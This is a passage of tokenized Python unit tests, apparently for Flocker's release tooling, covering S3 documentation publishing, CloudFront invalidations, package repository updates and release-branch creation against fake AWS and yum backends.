cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_previous_version ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_devel_new_files ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . 
cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_devel_removed_files ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_devel_previous_version ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> self . assertEqual ( <EOL> aws . 
cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_creates_cloudfront_invalidation_production ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { } , <EOL> } ) <EOL> self . publish_docs ( aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION ) <EOL> self . assertEqual ( <EOL> aws . cloudfront_invalidations , [ <EOL> CreateCloudFrontInvalidation ( <EOL> cname = '<STR_LIT>' , <EOL> paths = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } ) , <EOL> ] ) <EOL> def test_production_gets_tagged_version ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( routing_rules = { } , s3_buckets = { } ) <EOL> self . assertRaises ( <EOL> NotTagged , <EOL> self . publish_docs , <EOL> aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION ) <EOL> def test_production_can_publish_doc_version ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : { } , <EOL> } ) <EOL> self . publish_docs ( <EOL> aws , '<STR_LIT>' , '<STR_LIT>' , environment = Environments . 
PRODUCTION ) <EOL> def test_production_can_publish_prerelease ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { <EOL> } , <EOL> s3_buckets = { <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : { } , <EOL> } ) <EOL> self . publish_docs ( <EOL> aws , '<STR_LIT>' , '<STR_LIT>' , environment = Environments . PRODUCTION ) <EOL> def test_publish_non_release_fails ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( routing_rules = { } , s3_buckets = { } ) <EOL> self . assertRaises ( <EOL> NotARelease , <EOL> self . publish_docs , <EOL> aws , '<STR_LIT>' , '<STR_LIT>' , <EOL> environment = Environments . STAGING ) <EOL> def assert_error_key_update ( self , doc_version , environment , should_update ) : <EOL> """<STR_LIT>""" <EOL> bucket_names = set ( ) <EOL> for e in Environments . iterconstants ( ) : <EOL> bucket_names . add ( <EOL> DOCUMENTATION_CONFIGURATIONS [ e ] . documentation_bucket <EOL> ) <EOL> empty_buckets = { bucket_name : { } for bucket_name in bucket_names } <EOL> empty_buckets [ '<STR_LIT>' ] = { } <EOL> empty_error_keys = { bucket_name : b'<STR_LIT>' for bucket_name in bucket_names } <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = empty_buckets , <EOL> error_key = empty_error_keys <EOL> ) <EOL> expected_error_path = '<STR_LIT>' . format ( doc_version ) <EOL> expected_updated_bucket = ( <EOL> DOCUMENTATION_CONFIGURATIONS [ environment ] . documentation_bucket <EOL> ) <EOL> expected_error_keys = aws . error_key . copy ( ) <EOL> if should_update : <EOL> expected_error_keys [ expected_updated_bucket ] = expected_error_path <EOL> self . publish_docs ( <EOL> aws , <EOL> flocker_version = doc_version , <EOL> doc_version = doc_version , <EOL> environment = environment <EOL> ) <EOL> self . assertEqual ( expected_error_keys , aws . error_key ) <EOL> def test_error_key_dev_staging ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_error_key_update ( <EOL> doc_version = '<STR_LIT>' , <EOL> environment = Environments . 
STAGING , <EOL> should_update = True <EOL> ) <EOL> def test_error_key_dev_production ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_error_key_update ( <EOL> doc_version = '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION , <EOL> should_update = False <EOL> ) <EOL> def test_error_key_pre_staging ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_error_key_update ( <EOL> doc_version = '<STR_LIT>' , <EOL> environment = Environments . STAGING , <EOL> should_update = True <EOL> ) <EOL> def test_error_key_pre_production ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_error_key_update ( <EOL> doc_version = '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION , <EOL> should_update = False <EOL> ) <EOL> def test_error_key_marketing_staging ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_error_key_update ( <EOL> doc_version = '<STR_LIT>' , <EOL> environment = Environments . STAGING , <EOL> should_update = True <EOL> ) <EOL> def test_error_key_marketing_production ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assert_error_key_update ( <EOL> doc_version = '<STR_LIT>' , <EOL> environment = Environments . PRODUCTION , <EOL> should_update = True <EOL> ) <EOL> class UpdateRepoTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( UpdateRepoTests , self ) . setUp ( ) <EOL> self . target_bucket = '<STR_LIT>' <EOL> self . target_key = '<STR_LIT>' <EOL> self . package_directory = FilePath ( self . mktemp ( ) ) <EOL> self . packages = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def update_repo ( self , aws , yum , <EOL> package_directory , target_bucket , target_key , source_repo , <EOL> packages , flocker_version , distribution ) : <EOL> """<STR_LIT>""" <EOL> dispatchers = [ aws . get_dispatcher ( ) , yum . 
get_dispatcher ( ) , <EOL> base_dispatcher ] <EOL> sync_perform ( <EOL> ComposedDispatcher ( dispatchers ) , <EOL> update_repo ( <EOL> package_directory = package_directory , <EOL> target_bucket = target_bucket , <EOL> target_key = target_key , <EOL> source_repo = source_repo , <EOL> packages = packages , <EOL> flocker_version = flocker_version , <EOL> distribution = distribution , <EOL> ) <EOL> ) <EOL> def test_fake_rpm ( self ) : <EOL> """<STR_LIT>""" <EOL> existing_s3_keys = { <EOL> os . path . join ( self . target_key , '<STR_LIT>' ) : '<STR_LIT>' , <EOL> os . path . join ( self . target_key , <EOL> '<STR_LIT>' ) : <EOL> '<STR_LIT>' , <EOL> os . path . join ( self . target_key , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> '<STR_LIT>' , <EOL> os . path . join ( self . target_key , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> '<STR_LIT>' , <EOL> } <EOL> expected_keys = existing_s3_keys . copy ( ) <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . target_bucket : existing_s3_keys , <EOL> } , <EOL> ) <EOL> unspecified_package = '<STR_LIT>' <EOL> repo_contents = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> unspecified_package : '<STR_LIT>' , <EOL> } <EOL> self . update_repo ( <EOL> aws = aws , <EOL> yum = FakeYum ( ) , <EOL> package_directory = self . package_directory , <EOL> target_bucket = self . target_bucket , <EOL> target_key = self . target_key , <EOL> source_repo = create_fake_repository ( self , files = repo_contents ) , <EOL> packages = self . packages , <EOL> flocker_version = '<STR_LIT>' , <EOL> distribution = Distribution ( name = '<STR_LIT>' , version = '<STR_LIT>' ) , <EOL> ) <EOL> expected_packages = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } <EOL> expected_keys . 
update ( { <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> } ) <EOL> expected_keys . update ( { <EOL> os . path . join ( self . target_key , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> '<STR_LIT>' , <EOL> os . path . join ( self . target_key , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> '<STR_LIT>' + '<STR_LIT:U+002C>' . join ( sorted ( expected_packages ) ) , <EOL> } ) <EOL> self . assertEqual ( <EOL> expected_keys , <EOL> aws . s3_buckets [ self . target_bucket ] ) <EOL> def test_fake_deb ( self ) : <EOL> """<STR_LIT>""" <EOL> existing_s3_keys = { <EOL> os . path . join ( self . target_key , '<STR_LIT>' ) : '<STR_LIT>' , <EOL> os . path . join ( self . target_key , <EOL> '<STR_LIT>' ) : <EOL> '<STR_LIT>' , <EOL> os . path . join ( self . target_key , '<STR_LIT>' ) : <EOL> '<STR_LIT>' , <EOL> } <EOL> expected_keys = existing_s3_keys . copy ( ) <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . target_bucket : existing_s3_keys , <EOL> } , <EOL> ) <EOL> unspecified_package = '<STR_LIT>' <EOL> repo_contents = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> unspecified_package : '<STR_LIT>' , <EOL> } <EOL> self . update_repo ( <EOL> aws = aws , <EOL> yum = FakeYum ( ) , <EOL> package_directory = self . package_directory , <EOL> target_bucket = self . target_bucket , <EOL> target_key = self . target_key , <EOL> source_repo = create_fake_repository ( self , files = repo_contents ) , <EOL> packages = self . packages , <EOL> flocker_version = '<STR_LIT>' , <EOL> distribution = Distribution ( name = '<STR_LIT>' , version = '<STR_LIT>' ) , <EOL> ) <EOL> expected_packages = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } <EOL> expected_keys . 
update ( { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' : <EOL> '<STR_LIT>' + '<STR_LIT:U+002C>' . join ( sorted ( expected_packages ) ) , <EOL> } ) <EOL> self . assertEqual ( <EOL> expected_keys , <EOL> aws . s3_buckets [ self . target_bucket ] ) <EOL> def test_package_not_available_exception ( self ) : <EOL> """<STR_LIT>""" <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . target_bucket : { } , <EOL> } , <EOL> ) <EOL> exception = self . assertRaises ( <EOL> HTTPError , <EOL> self . update_repo , <EOL> aws = aws , <EOL> yum = FakeYum ( ) , <EOL> package_directory = self . package_directory , <EOL> target_bucket = self . target_bucket , <EOL> target_key = self . target_key , <EOL> source_repo = create_fake_repository ( <EOL> self , files = { } ) , <EOL> packages = self . packages , <EOL> flocker_version = '<STR_LIT>' , <EOL> distribution = Distribution ( name = "<STR_LIT>" , version = "<STR_LIT>" ) , <EOL> ) <EOL> self . assertEqual ( <NUM_LIT> , exception . response . status_code ) <EOL> @ skipUnless ( which ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" ) <EOL> def test_real_yum_utils ( self ) : <EOL> """<STR_LIT>""" <EOL> source_repo = FilePath ( self . mktemp ( ) ) <EOL> source_repo . createDirectory ( ) <EOL> FilePath ( __file__ ) . sibling ( '<STR_LIT>' ) . copyTo ( source_repo ) <EOL> repo_uri = '<STR_LIT>' + source_repo . path <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . target_bucket : { } , <EOL> } , <EOL> ) <EOL> class RealYum ( object ) : <EOL> def get_dispatcher ( self ) : <EOL> return yum_dispatcher <EOL> self . update_repo ( <EOL> aws = aws , <EOL> yum = RealYum ( ) , <EOL> package_directory = self . package_directory , <EOL> target_bucket = self . target_bucket , <EOL> target_key = self . target_key , <EOL> source_repo = repo_uri , <EOL> packages = self . 
packages , <EOL> flocker_version = '<STR_LIT>' , <EOL> distribution = Distribution ( name = '<STR_LIT>' , version = '<STR_LIT>' ) , <EOL> ) <EOL> expected_files = { <EOL> os . path . join ( self . target_key , file ) <EOL> for file in [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> } <EOL> files_on_s3 = aws . s3_buckets [ self . target_bucket ] <EOL> repodata_path = os . path . join ( self . target_key , '<STR_LIT>' ) <EOL> for metadata_file in [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] : <EOL> for key in files_on_s3 : <EOL> if ( key . endswith ( metadata_file ) and <EOL> key . startswith ( repodata_path ) ) : <EOL> expected_files . add ( <EOL> os . path . join ( <EOL> repodata_path , <EOL> sha256 ( files_on_s3 [ key ] ) . hexdigest ( ) + <EOL> '<STR_LIT:->' + metadata_file ) <EOL> ) <EOL> break <EOL> else : <EOL> expected_files . add ( <EOL> os . path . join ( <EOL> repodata_path , '<STR_LIT>' + metadata_file ) ) <EOL> self . assertEqual ( expected_files , set ( files_on_s3 . keys ( ) ) ) <EOL> @ skipUnless ( which ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" ) <EOL> def test_real_dpkg_utils ( self ) : <EOL> """<STR_LIT>""" <EOL> source_repo = FilePath ( self . mktemp ( ) ) <EOL> source_repo . createDirectory ( ) <EOL> FilePath ( __file__ ) . sibling ( '<STR_LIT>' ) . copyTo ( source_repo ) <EOL> repo_uri = '<STR_LIT>' + source_repo . path <EOL> aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . target_bucket : { } , <EOL> } , <EOL> ) <EOL> class RealYum ( object ) : <EOL> def get_dispatcher ( self ) : <EOL> return yum_dispatcher <EOL> self . update_repo ( <EOL> aws = aws , <EOL> yum = RealYum ( ) , <EOL> package_directory = self . package_directory , <EOL> target_bucket = self . target_bucket , <EOL> target_key = self . target_key , <EOL> source_repo = repo_uri , <EOL> packages = self . 
packages , <EOL> flocker_version = '<STR_LIT>' , <EOL> distribution = Distribution ( name = "<STR_LIT>" , version = "<STR_LIT>" ) , <EOL> ) <EOL> expected_files = { <EOL> os . path . join ( self . target_key , file ) <EOL> for file in [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> } <EOL> files_on_s3 = aws . s3_buckets [ self . target_bucket ] <EOL> self . assertEqual ( expected_files , set ( files_on_s3 . keys ( ) ) ) <EOL> packages_gz = files_on_s3 [ os . path . join ( self . target_key , '<STR_LIT>' ) ] <EOL> with GzipFile ( fileobj = StringIO ( packages_gz ) , mode = "<STR_LIT:r>" ) as f : <EOL> packages_metadata = f . read ( ) <EOL> self . assertNotIn ( self . package_directory . path , packages_metadata ) <EOL> class UploadPackagesTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def upload_packages ( self , aws , yum , <EOL> scratch_directory , target_bucket , version , <EOL> build_server , top_level ) : <EOL> """<STR_LIT>""" <EOL> dispatchers = [ aws . get_dispatcher ( ) , yum . get_dispatcher ( ) , <EOL> base_dispatcher ] <EOL> sync_perform ( <EOL> ComposedDispatcher ( dispatchers ) , <EOL> upload_packages ( <EOL> scratch_directory = scratch_directory , <EOL> target_bucket = target_bucket , <EOL> version = version , <EOL> build_server = build_server , <EOL> top_level = top_level , <EOL> ) , <EOL> ) <EOL> def setUp ( self ) : <EOL> super ( UploadPackagesTests , self ) . setUp ( ) <EOL> self . scratch_directory = FilePath ( self . mktemp ( ) ) <EOL> self . scratch_directory . createDirectory ( ) <EOL> self . target_bucket = '<STR_LIT>' <EOL> self . aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . target_bucket : { } , <EOL> } , <EOL> ) <EOL> self . 
build_server = '<STR_LIT>' <EOL> @ skipIf ( True , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_repositories_created ( self ) : <EOL> """<STR_LIT>""" <EOL> repo_contents = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . upload_packages ( <EOL> aws = self . aws , <EOL> yum = FakeYum ( ) , <EOL> scratch_directory = self . scratch_directory , <EOL> target_bucket = self . target_bucket , <EOL> version = '<STR_LIT>' , <EOL> build_server = create_fake_repository ( self , files = repo_contents ) , <EOL> top_level = FLOCKER_PATH , <EOL> ) <EOL> expected_files = { <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> } <EOL> files_on_s3 = self . aws . s3_buckets [ self . target_bucket ] . keys ( ) <EOL> self . 
assertEqual ( expected_files , set ( files_on_s3 ) ) <EOL> @ skipIf ( True , "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def test_key_suffixes ( self ) : <EOL> """<STR_LIT>""" <EOL> repo_contents = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> self . upload_packages ( <EOL> aws = self . aws , <EOL> yum = FakeYum ( ) , <EOL> scratch_directory = self . scratch_directory , <EOL> target_bucket = self . target_bucket , <EOL> version = '<STR_LIT>' , <EOL> build_server = create_fake_repository ( self , files = repo_contents ) , <EOL> top_level = FLOCKER_PATH , <EOL> ) <EOL> files_on_s3 = self . aws . s3_buckets [ self . target_bucket ] . keys ( ) <EOL> self . assertEqual ( set ( ) , { f for f in files_on_s3 if '<STR_LIT>' in f } ) <EOL> def create_fake_repository ( test_case , files ) : <EOL> """<STR_LIT>""" <EOL> source_repo = FilePath ( test_case . mktemp ( ) ) <EOL> source_repo . createDirectory <EOL> for key in files : <EOL> new_file = source_repo . preauthChild ( key ) <EOL> if not new_file . parent ( ) . exists ( ) : <EOL> new_file . parent ( ) . makedirs ( ) <EOL> new_file . setContent ( files [ key ] ) <EOL> return '<STR_LIT>' + source_repo . path <EOL> class UploadPythonPackagesTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( UploadPythonPackagesTests , self ) . setUp ( ) <EOL> self . target_bucket = '<STR_LIT>' <EOL> self . scratch_directory = FilePath ( self . mktemp ( ) ) <EOL> self . top_level = FilePath ( self . mktemp ( ) ) <EOL> self . top_level . makedirs ( ) <EOL> self . aws = FakeAWS ( <EOL> routing_rules = { } , <EOL> s3_buckets = { <EOL> self . 
target_bucket : { } , <EOL> } ) <EOL> def upload_python_packages ( self ) : <EOL> """<STR_LIT>""" <EOL> dispatchers = [ self . aws . get_dispatcher ( ) , base_dispatcher ] <EOL> with open ( os . devnull , "<STR_LIT:w>" ) as discard : <EOL> sync_perform ( <EOL> ComposedDispatcher ( dispatchers ) , <EOL> upload_python_packages ( <EOL> scratch_directory = self . scratch_directory , <EOL> target_bucket = self . target_bucket , <EOL> top_level = self . top_level , <EOL> output = discard , <EOL> error = discard , <EOL> ) <EOL> ) <EOL> @ skipUnless ( hard_linking_possible ( ) , <EOL> "<STR_LIT>" ) <EOL> def test_distributions_uploaded ( self ) : <EOL> """<STR_LIT>""" <EOL> self . top_level . child ( '<STR_LIT>' ) . setContent ( <EOL> dedent ( """<STR_LIT>""" ) . format ( package_version = '<STR_LIT>' ) <EOL> ) <EOL> self . upload_python_packages ( ) <EOL> aws_keys = self . aws . s3_buckets [ self . target_bucket ] . keys ( ) <EOL> self . assertEqual ( <EOL> sorted ( aws_keys ) , <EOL> [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> class UploadOptionsTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_must_be_release_version ( self ) : <EOL> """<STR_LIT>""" <EOL> options = UploadOptions ( ) <EOL> self . assertRaises ( <EOL> NotARelease , <EOL> options . parseOptions , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def test_documentation_release_fails ( self ) : <EOL> """<STR_LIT>""" <EOL> options = UploadOptions ( ) <EOL> self . assertRaises ( <EOL> DocumentationRelease , <EOL> options . parseOptions , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> class CreateReleaseBranchOptionsTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_flocker_version_required ( self ) : <EOL> """<STR_LIT>""" <EOL> options = CreateReleaseBranchOptions ( ) <EOL> self . assertRaises ( <EOL> UsageError , <EOL> options . parseOptions , [ ] ) <EOL> def create_git_repository ( test_case , bare = False ) : <EOL> """<STR_LIT>""" <EOL> directory = FilePath ( test_case . 
mktemp ( ) ) <EOL> repository = Repo . init ( path = directory . path , bare = bare ) <EOL> if not bare : <EOL> directory . child ( '<STR_LIT>' ) . makedirs ( ) <EOL> directory . child ( '<STR_LIT>' ) . touch ( ) <EOL> repository . index . add ( [ '<STR_LIT>' ] ) <EOL> repository . index . commit ( '<STR_LIT>' ) <EOL> repository . create_head ( '<STR_LIT>' ) <EOL> return repository <EOL> class CreateReleaseBranchTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( CreateReleaseBranchTests , self ) . setUp ( ) <EOL> self . repo = create_git_repository ( test_case = self ) <EOL> def test_branch_exists_fails ( self ) : <EOL> """<STR_LIT>""" <EOL> branch = self . repo . create_head ( '<STR_LIT>' ) <EOL> self . assertRaises ( <EOL> BranchExists , <EOL> create_release_branch , '<STR_LIT>' , base_branch = branch ) <EOL> def test_active_branch ( self ) : <EOL> """<STR_LIT>""" <EOL> branch = self . repo . create_head ( '<STR_LIT>' ) <EOL> create_release_branch ( version = '<STR_LIT>' , base_branch = branch ) <EOL> self . assertEqual ( <EOL> self . repo . active_branch . name , <EOL> "<STR_LIT>" ) <EOL> def test_branch_created_from_base ( self ) : <EOL> """<STR_LIT>""" <EOL> master = self . repo . active_branch <EOL> branch = self . repo . create_head ( '<STR_LIT>' ) <EOL> branch . checkout ( ) <EOL> FilePath ( self . repo . working_dir ) . child ( '<STR_LIT>' ) . touch ( ) <EOL> self . repo . index . add ( [ '<STR_LIT>' ] ) <EOL> self . repo . index . commit ( '<STR_LIT>' ) <EOL> master . checkout ( ) <EOL> create_release_branch ( version = '<STR_LIT>' , base_branch = branch ) <EOL> self . assertIn ( ( u'<STR_LIT>' , <NUM_LIT:0> ) , self . repo . index . entries ) <EOL> class CreatePipIndexTests ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> super ( CreatePipIndexTests , self ) . setUp ( ) <EOL> self . scratch_directory = FilePath ( self . mktemp ( ) ) <EOL> self 